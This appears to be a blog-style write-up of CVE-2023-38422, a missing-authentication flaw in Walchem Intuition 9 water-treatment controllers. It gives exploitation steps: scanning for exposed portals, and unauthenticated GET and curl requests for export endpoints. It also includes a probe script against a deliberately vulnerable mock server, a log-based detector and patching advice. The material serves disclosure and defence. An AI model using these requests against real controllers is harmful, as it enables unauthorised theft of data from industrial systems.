---
Network-connected industrial controllers are everywhere. From water treatment to chemical dosing, specialized hardware keeps processes running, and it is usually managed through a web interface. But what if that portal lets anyone in?
Today we're diving deep into CVE-2023-38422, a missing-authentication vulnerability in Walchem Intuition 9 process controllers that affects firmware versions prior to 4.21. We'll break down what went wrong, show how the bug can be exploited, and point you to the official references.
> In a nutshell:
> Some API routes in the Intuition 9's web management server don't require authentication. Any attacker with network access to the portal can pull configuration and logs (and, if such a route exists, possibly credential data) straight from the device, without ever logging in and without tripping a failed-login alarm.
What Is The Walchem Intuition 9?
Walchem’s "Intuition 9" is an industrial controller for water treatment and process automation. It connects to process sensors and actuators, and provides a web portal for setup, monitoring, and exporting data (CSV logs, event histories, etc.).
Industrial devices aren't known for rigorous web security; usability usually wins over defense. But a route that serves data without checking for a session at all (CWE-306, missing authentication for a critical function) is a particularly serious slip, because it needs no password guessing, no exploit payload and no special tooling.
The Vulnerability: CVE-2023-38422
Summary:
In firmware versions below 4.21, some HTTP API routes on the Intuition 9 web management server fail to check for a valid login session. An unauthenticated remote user who can reach the web port can therefore request those data endpoints directly and receive the same response a logged-in operator would.
Official Advisory:
- CISA ICS Advisory (ICSA-23-205-06)
- NVD entry for CVE-2023-38422
Exploit Details: How Attackers Can Steal Data
Let’s get to the good stuff: practical exploitation.
The web management server hosts API endpoints used for exporting configuration and logs. Normally these should be reachable *only* by logged-in users. Because the authentication check is missing on some of them, they are openly reachable. The advisory does not enumerate which routes are affected, so treat the paths below as examples of the kind of endpoint involved rather than a confirmed list.
Step 1: Find The Device
Attackers scan for open management ports (by default TCP 80 or 443, depending on configuration). Shodan and Censys routinely index exposed controllers; searching for the product's HTTP banner or page title is enough to build a target list. On a network you are authorised to test, nmap's http-title script gives the same signal:
nmap -p 80,443 --open --script http-title <target-network>
Step 2: Access An Export Endpoint
Export endpoints on controllers of this kind typically have paths like /export.csv, /download_logs, or /export_data. These names are illustrative; the affected routes are not named in the advisory, so confirm them from the portal's own page source or by watching the browser's network traffic while logged in.
For example, try
GET http://<CONTROLLER_IP>/export.csv HTTP/1.1
Host: <CONTROLLER_IP>
If the route is one of the unprotected ones, no authentication is required: the controller answers 200 OK with the file (configuration, calibration, or sensor logs) instead of redirecting to the login page. The simplest check is to request the same path twice, once from a logged-in browser session and once from a clean client with no cookies, and compare the two responses.
Example cURL Exploit
curl -o data_export.csv http://192.168.1.100/export.csv
Result: the local file data_export.csv now contains the controller's *internal logs*, obtained without credentials.
Step 3: (Optional) Grab More Goodies
Other export endpoints may be exposed the same way, for example event logs (/events.csv) and configuration dumps (/export_config). Whether any route exposes user credentials (hashed or obscured, but still valuable to an attacker) is not confirmed by the advisory, so treat that as a possibility to verify during testing, not a given.
Example API Request
GET http://<CONTROLLER_IP>/export_config HTTP/1.1
A configuration dump of this kind includes, among other things:
- Network configuration (IP, gateway, etc.)
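The three steps above boil down to one check: request each candidate export path with no cookies and no credentials, and see whether the device hands back data or bounces you to the login page. The script below is an added example, not code from the original post or from Walchem. It embeds a constructed mock of a pre-4.21 controller (one route skips the session check, the CWE-306 pattern; the others enforce it) so the probe can be exercised offline; the route names, the mock's behaviour and the session cookie are assumptions, since the advisory does not name the affected routes.

```python
"""Probe a controller's export routes for missing authentication (added example).

The mock controller, the route names and the session cookie below are
constructed assumptions; CVE-2023-38422 does not name the affected routes.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Candidate export routes to probe. Hypothetical names, not taken from the advisory.
CANDIDATE_PATHS = ["/export.csv", "/events.csv", "/export_config", "/download_logs"]


class MockController(BaseHTTPRequestHandler):
    """Stand-in for a pre-4.21 device: /export.csv forgets the session check,
    the other routes enforce it (one by redirect, one by 401)."""

    SESSION_COOKIE = "session=valid"  # assumed cookie name/value

    def _logged_in(self):
        return self.SESSION_COOKIE in (self.headers.get("Cookie") or "")

    def do_GET(self):
        if self.path == "/export.csv":
            # BUG (intentional, models the CVE): data served without _logged_in().
            body = b"timestamp,pH,ORP\n2023-08-01T00:00:00Z,7.2,650\n"
            self._send(200, "text/csv", body)
        elif self.path == "/events.csv":
            if not self._logged_in():
                self._redirect_to_login()
                return
            self._send(200, "text/csv", b"timestamp,event\n")
        elif self.path == "/export_config":
            if not self._logged_in():
                self._send(401, "text/plain", b"Unauthorized")
                return
            self._send(200, "application/json", b'{"ip":"192.0.2.10"}')
        else:
            self._send(404, "text/plain", b"Not found")

    def _redirect_to_login(self):
        self.send_response(302)
        self.send_header("Location", "/login")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def _send(self, status, ctype, body):
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the mock quiet
        pass


def classify(status, headers, body):
    """Map one anonymous response to a verdict. `headers` has lower-cased keys."""
    if status in (401, 403):
        return "auth-enforced"
    if status in (301, 302, 303, 307, 308):
        loc = headers.get("location", "")
        return "auth-enforced" if "login" in loc.lower() else "redirect"
    if status == 404:
        return "absent"
    if status == 200:
        # A 200 that hands back the login form itself is not a leak.
        if "text/html" in headers.get("content-type", "") and b"password" in body.lower():
            return "auth-enforced"
        return "exposed" if body.strip() else "empty"
    return f"http-{status}"


def probe(host, port, paths=CANDIDATE_PATHS, timeout=5):
    """GET each path with no Cookie or Authorization header; return {path: verdict}.
    http.client is used because it does not follow redirects, so a bounce to
    the login page is seen as such rather than as a 200 from /login."""
    verdicts = {}
    for path in paths:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", path)  # deliberately anonymous
            resp = conn.getresponse()
            body = resp.read()
            headers = {k.lower(): v for k, v in resp.getheaders()}
            verdicts[path] = classify(resp.status, headers, body)
        finally:
            conn.close()
    return verdicts


def start_mock_controller():
    """Serve the mock on an ephemeral loopback port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), MockController)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    server, port = start_mock_controller()
    for path, verdict in probe("127.0.0.1", port).items():
        print(f"{path:16} {verdict}")
    server.shutdown()
```

Against the mock, /export.csv comes back "exposed" while /events.csv and /export_config are "auth-enforced"; pointed at a real controller (replace the host and port, and the path list with routes you have confirmed from the portal), any "exposed" verdict on a data route is the finding this CVE describes. A patched device should answer every path in the list with a redirect or a 401.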
Real-world risk:
Attackers can use the configuration data to:
- Study the plant/process workflow,
Upgrade now:
Install firmware 4.21 or later from Walchem, then confirm the running version in the portal's system page and re-run the unauthenticated request from Step 2; it should now be redirected to the login page or rejected.
Limit exposure until you can patch:
Keep the controller's web port off the internet and reachable only from the engineering network or through a VPN, the standard CISA guidance for ICS devices.
Monitor logs:
Review the web server's access logs for requests to export/download endpoints that succeeded (200) from addresses outside the engineering subnet, or from clients that never hit the login page first. Because the bug bypasses login entirely, failed-login alerts will not fire; the download itself is the only trace.
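The log review described above can be automated. The following is an added example, not part of the original post or of any Walchem tooling. It assumes the controller's HTTP access log is collected in an Apache combined-style format (the Intuition 9's own log format is not documented in the advisory), that 10.20.1.0/24 is the trusted engineering subnet, and uses constructed sample lines; the second and fourth lines are the ones a defender would want flagged.

```python
"""Flag export/download requests that look unauthenticated (added example).

Log format, trusted subnet and sample lines are constructed assumptions;
the Intuition 9's real log format is not described in the advisory.
"""
import ipaddress
import re
from collections import Counter
from datetime import datetime

# Constructed sample: an operator on the engineering LAN, an outside host
# scraping exports anonymously, and a host that was correctly redirected (302).
SAMPLE_LOG = """\
10.20.1.15 - operator [23/Aug/2023:09:14:02 +0000] "GET /status HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.77 - - [23/Aug/2023:09:14:09 +0000] "GET /export.csv HTTP/1.1" 200 48211 "-" "python-requests/2.31"
10.20.1.15 - operator [23/Aug/2023:09:15:30 +0000] "GET /export.csv HTTP/1.1" 200 48211 "http://10.20.1.5/data" "Mozilla/5.0"
203.0.113.77 - - [23/Aug/2023:09:14:11 +0000] "GET /export_config HTTP/1.1" 200 2210 "-" "python-requests/2.31"
198.51.100.9 - - [23/Aug/2023:09:20:00 +0000] "GET /export.csv HTTP/1.1" 302 0 "-" "curl/8.1.2"
"""

# Apache combined-style line; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Paths that hand out bulk data: export/download/event routes and any .csv.
EXPORT_RE = re.compile(r'/(export|download|events)[^/]*$|\.csv$', re.IGNORECASE)
ENGINEERING_NETS = [ipaddress.ip_network("10.20.1.0/24")]  # assumed trusted range


def parse(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def is_export_path(path):
    return bool(EXPORT_RE.search(path.split("?", 1)[0]))


def in_trusted_net(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ENGINEERING_NETS)


def find_suspicious(log_text):
    """Return records of successful (200) export downloads that either carry no
    authenticated user or originate outside the trusted subnet. A 302 is what a
    patched device answers to an anonymous client, so it is not flagged."""
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec or rec["status"] != 200 or not is_export_path(rec["path"]):
            continue
        anonymous = rec["user"] == "-"
        if anonymous or not in_trusted_net(rec["ip"]):
            rec["reason"] = "no-auth-user" if anonymous else "untrusted-source"
            hits.append(rec)
    return hits


def exports_per_source(hits):
    """Count flagged downloads per client address; bulk collection shows up as a spike."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    flagged = find_suspicious(SAMPLE_LOG)
    for h in flagged:
        print(f'{h["ts"].isoformat()} {h["ip"]:15} {h["path"]:16} {h["reason"]}')
    print(dict(exports_per_source(flagged)))
```

The user field is only populated for HTTP-auth logins, so on a cookie-based portal the source-address test is the reliable signal and the username test is a bonus; adjust ENGINEERING_NETS to your own address plan. Feed the function the collected log text instead of SAMPLE_LOG to run it on real data.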
Further Reading
- CISA ICS Advisory ICSA-23-205-06
- National Vulnerability Database - CVE-2023-38422
- Walchem Intuition 9 Product Page (Upgrade links)
If you're running industrial controls, patch your systems today, and keep management interfaces reachable only through a VPN or a tightly scoped firewall rule rather than from the open internet. This is a classic example of why even a simple authentication lapse in OT (operational technology) can have an outsized impact: no exploit code was needed, just a URL.
Timeline
Published on: 08/23/2023 22:15:00 UTC
Last modified on: 09/05/2023 19:41:00 UTC